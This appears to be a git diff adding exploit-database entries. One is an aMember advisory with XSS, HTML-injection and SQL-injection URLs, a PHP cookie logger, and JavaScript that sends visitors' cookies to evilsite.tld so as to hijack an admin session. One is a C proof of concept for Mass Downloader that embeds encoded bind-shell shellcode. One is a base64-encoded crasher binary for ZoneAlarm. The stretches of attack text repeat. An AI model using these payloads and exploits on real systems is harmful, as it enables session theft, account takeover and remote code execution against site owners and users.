-logData(); -header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); -?> - -When you have gotten a hash from the admin of the victim site you can issue: -Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie) - -What's the first thing you could do as admin? -http://www.website.tld/amember/admin/backup.php - -What's the best way to exploit the vulnerability? -1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters) - -2) The file should contain the following: -HTML Code: - -document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie; - -3) Sign up and make you first name: (try aff_signup.php to avoid paying!) -"> +http://www.website.tld/amember/admin/users.php?status="> +http://www.website.tld/amember/admin/users.php?letter="> +http://www.website.tld/amember/admin/users.php?action= +http://www.website.tld/amember/admin/setup.php?notebook= +http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="> +http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="> +http://www.website.tld/amember/admin/products.php?action= +http://www.website.tld/amember/admin/protect.php?action= +http://www.website.tld/amember/admin/coupons.php?action= +http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="> +http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="> +http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl= +http://www.website.tld/amember/aff.php?action= (this might only affect attacker) +- More files might be affected. + +HTML Injection: (insert: "> into the mentioned forms) +http://www.website.tld/amember/signup.php (first- and last-name) +http://www.website.tld/amember/aff_signup.php (first- and last-name) +http://www.website.tld/amember/profile.php (first- and last-name) + +HTML Injection Exception: (this injection might only be possible to be seen by the attacker) +http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too) + +Affeced Sites (by HTML Injection): +http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive) +http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string +http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection) +http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID +http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID +http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID +http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME +-- More files might be affected. + +SQL Injection: (requires admin access) +http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC +http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales +http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL' +-- More files might be affected, the depth of SQL Injection was not checked! + + +-:: Solution ::- +All the files are encrypted according to CGI Systems' website. + +Questions and answers (quote) + +I've downloaded aMember, but the source code is corrupted. How can I download it again ? +The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology + +Which essentially mean i was unable to find any solution to the problem. +I believe this vulnerability might be exploited in the wild due to it is very +easy to find and take advantage of. (if you know what you're looking for) + +Addition: The most easy solution would be to use a regular expression to fix this issue. + + +-:: Ways of abusing the HTML Injection and XSS ::- +The following are examples of what you can input as first- and/or last-name: +"> tag at the end. However, this is +especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is +valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag. + +Firstname: "> document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie; +- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work. +-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm + +CookieLogger: +"); +else +fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); +fclose($log); +} + +logData(); +header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); +?> + +When you have gotten a hash from the admin of the victim site you can issue: +Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie) + +What's the first thing you could do as admin? +http://www.website.tld/amember/admin/backup.php + +What's the best way to exploit the vulnerability? +1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters) + +2) The file should contain the following: +HTML Code: + +document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie; + +3) Sign up and make you first name: (try aff_signup.php to avoid paying!) +"> +#include +#include +#include +#include +#include +#include +#include +#include +#include + + + + +unsigned char bind_scode[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" + "\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37" + "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48" + "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38" + "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" + "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" + "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54" + "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38" + "\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43" + "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37" + "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a" + "\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b" + "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33" + "\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57" + "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49" + "\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36" + "\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + +unsigned char user_scode[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" + "\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37" + "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48" + "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38" + "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" + "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" + "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54" + "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38" + "\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43" + "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37" + "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a" + "\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b" + "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33" + "\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57" + "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49" + "\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36" + "\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a" + + +unsigned char ra_sp2[] = "\xFF\xBE\x3F\x7E"; //massdown.dll +unsigned char ra_sp3[] = "\x7B\x30\xE4\x77"; //massdown.dll + +unsigned char nops1[12]; //14115 * \x90 +unsigned char nops2[2068]; //2068 * \x90 + +int main(int argc, char **argv) +{ + int i; + FILE* f; + char* ra=NULL; + char* scode=NULL; + printf("[+] Mass Downloader 2.6 Remote Denial of Service PoC \n"); + printf("[+] Discovered by Ciph3r \n"); + printf("[+] Code by Ciph3r Ciph3r_blackhat[at]yahoo[dot]com\n"); + if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){ + printf("Usage: %s target Ciph3r\n",argv[0]); + printf("Where target is:\n"); + printf("0: winXP Pro SP2\n"); + printf("1: win2k\n") + return EXIT_SUCCESS; + } +for(i=0;i<12;i++) nops1[i]='\x90'; + nops1[12]='\0'; + for(i=0;i<2068;i++) nops2[i]='\x90'; + nops2[2068]='\0'; + if(atoi(argv[1])==0) ra=ra_sp2; + else ra=ra_sp3; + if(atoi(argv[2])==0) scode=bind_scode; + else scode=user_scode; + f=fopen("Ciph3r.exe","wb"); + fprintf(f,nops1,ra,nops2,scode,'\xd','\xa'); + fflush(f); + fclose(f); + printf("Ciph3r.exe created!\n"); + return EXIT_SUCCESS; +} diff --git a/platforms/windows/dos/32428.txt b/platforms/windows/dos/32428.txt new file mode 100755 index 000000000..8f1931da9 --- /dev/null +++ b/platforms/windows/dos/32428.txt @@ -0,0 +1,126 @@ +source: http://www.securityfocus.com/bid/31431/info + +ZoneAlarm Internet Security Suite is prone to a remote denial-of-service vulnerability that occurs in the TrueVector component when connecting to a malicious HTTP proxy. + +ZoneAlarm Internet Security Suite 8.0.020 is vulnerable; other versions may also be affected. + +za_crasher_proxy.b64 (Base64 Encoded File) + + + +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 